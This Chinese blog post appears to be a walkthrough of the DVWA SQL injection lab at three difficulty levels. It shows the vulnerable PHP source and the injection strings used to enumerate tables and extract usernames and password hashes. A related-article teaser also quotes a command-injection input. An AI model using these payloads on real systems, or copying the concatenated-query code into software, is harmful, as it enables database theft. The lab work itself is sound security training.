DVWA SQL注入(低中高三级)

最新推荐文章于 2024-04-29 20:54:11 发布
最新推荐文章于 2024-04-29 20:54:11 发布
阅读量1.7k 收藏 7
点赞数 1
分类专栏: web 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45492773/article/details/101467088
版权

low级

low级源代码

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

1.先进行简单的ID查询
输入输入正确的ID,将显示ID First name,Surname信息。
在这里插入图片描述

2.检测是否可以注入 可知此位为注入点,输入:‘ 返回错误

在这里插入图片描述

3.尝试遍历数据库表,提示输入的值是ID,可以初步判断此处为数字类型的注入。
尝试输入:1 or 1=1
在这里插入图片描述

没有达到目的,再尝试:1' or' 1' =' 1
显示出数据库中所有内容。
在这里插入图片描述

4.查询字段数
1’order by Num# 查询信息列表长度
Num 从1开始测试,输入1’order by 1# 正常显示。
在这里插入图片描述

当Num输入到3 时,页面报错。
在这里插入图片描述
由此我们判断查询结果值为2列。

5.联合查询

输入:1’ union select 1,2#
在这里插入图片描述

再查询,输入:1’ union select 1,2,3#
在这里插入图片描述
可知,含有两字段。

6.综合查询
查询所有库所有表1' union select table_name,table_schema from information_schema.tables #
在这里插入图片描述

统计每库中表的数量

1' UNION select table_schema,count(*) FROM information_Schema.tables group by table_schema

在这里插入图片描述
DVWA 中的表名

1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#

在这里插入图片描述

user 表中的所有列

1' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'#

在这里插入图片描述

查询 user、password列的内容

1' union select user,password from dvwa.users#

在这里插入图片描述

Medium 级

Medium源代码

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

此级别利用Burp Suite 或者hackbar

在这里插入图片描述
判断显示行数
圈中部分修改为

id=1 order by 2 &Submit=Submit

在这里插入图片描述
判断数据库名称

id=1 union select 1,2  &Submit=Submit

在这里插入图片描述
.
.
.
.
.

其他操作与low级相同。
查询 user、password列的内容
在这里插入图片描述
在这里插入图片描述

high 级

high级源代码

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?>

在这里插入图片描述
判断行数,行数为2
在这里插入图片描述
在这里插入图片描述
判断数据库名称
在这里插入图片描述
在这里插入图片描述
其他的步骤与低级相同。

-Yanug-
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
命令注入: DVWA级别分别设置Low、Medium、High、Impossible 进行命令注入
彭淦淦的博客
05-09 5246
2.2 步骤 实现此案例需要按照如下步骤进行。 步骤一:DVWA级别设置Low 1)访问DVWA,选择Low级别,然后点击“Command Injection”,如图-15所示 图-15 2)输入192.168.111.142并提交,正常显示结果,如图-16所示 图-16 3)输入192.168.111.142&&net user并提交,爆出了用户名,如图-17所示 图-17 步骤二:DVWA级别设置Medium 1)访问DVWA,选择Medium级别,然后点
Web安全之DVWA--SQL注入(从低级到级)
w17691058648x的博客
07-04 5761
SQL注入低级(low) 低级核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = ...
DVWA SQL Injection(SQL注入)全等级
柠檬i的博客
12-19 2893
SQL Injection(回显注入) 目录:SQL Injection(回显注入)1. Low2.Medium3. High4.Impossible5.运用sqlmap自动化注入1.查看信息2.查看数据库名3.查看表名4.查看字段名5.查看字段数据登录 注入思路: 是否有注入?有无回显?是字符型还是数字型?
DVWA-SQL注入(SQL Injection)低//级别
wangyuxiang946的博客
08-14 1万+
DVWA是一个用来联系渗透的靶场,其包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤 SQL Injection-low级别 SQL注入的low级别需要我们输入用户的ID作为参数,后端的SQL语句根据用户ID查询用户的信息并返回,执行SQL之前并没有过滤,源码如下 我们输入一个正确的用户ID : 1 , 发现输入的参数拼接到了url地址栏,由此推断,此关卡使用的请求方式为GET请求,我们直接在输.
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中代码分析(1)
最新发布
2401_84253132的博客
04-29 920
这样的话估计不能使用Error注入。结论:字段为2。
DVWA的安装教程和通关详解
热门推荐
路baby的博客
11-27 3万+
DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的Web漏洞。有详细的DVWA的安装教程,和通关详解
DVWA-SQL注入
qq_60848021的博客
06-25 1155
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库存放一个information_schema 的数据库,这个数据库,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表的字段 SCHEMA_NAME,这个表记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为: TABLES_SCHEMA和TABLES_NAME。C
DVWA系列---基于报错的SQL注入(SQL Injection)
野原新之助
02-06 1250
文章目录1、Low2、Medium3、High
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
学习之sql注入漏洞网址的创建
06-06
3. 修改dvwa源码:找到与SQL注入相关的页面,如dvwa/vulnerabilities/sqli-literal/,修改其查询代码,增加易受攻击的点。 4. 验证注入:在浏览器输入修改后的URL,尝试输入SQL注入语句,观察是否能得到预期的结果...
DVWA_SQL注入低中等级讲解
Keiltest的博客
08-10 1034
本章讲解了sql注入
DVWA---SQL注入(低级别
qq_49091880的博客
01-13 575
DVWA级别为低 1.分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sql注入。 2.判断sql是否存在存入,以及注入的类型 测试:1' and '1'='1 3.猜解SQL查询语句的字段数 测试:3.1 1' order by 2# 测试:3.2 1' order by 3# 测试:3.3从上面两个图可以说明,SQL语句查询的表的字段数是2 4.确定显示的位置(SQL语句查询之后的回显...
DVWA通过攻略之SQL注入
勿山几已
05-24 8540
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWASQL注入
qq_58091216的博客
05-01 2万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
DVWA——SQL注入
qq_62803993的博客
01-08 2440
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
DVWA-------简单的SQL注入
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
DVWASQL注入攻防实战指南
"DVWA(Damn Vulnerable Web ...DVWASQL注入练习帮助我们理解攻击者的思路,提SQL注入漏洞的认识,并学习如何防止这类攻击。通过这样的实践,我们可以提升Web应用的安全性,避免潜在的数据泄露和系统破坏。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值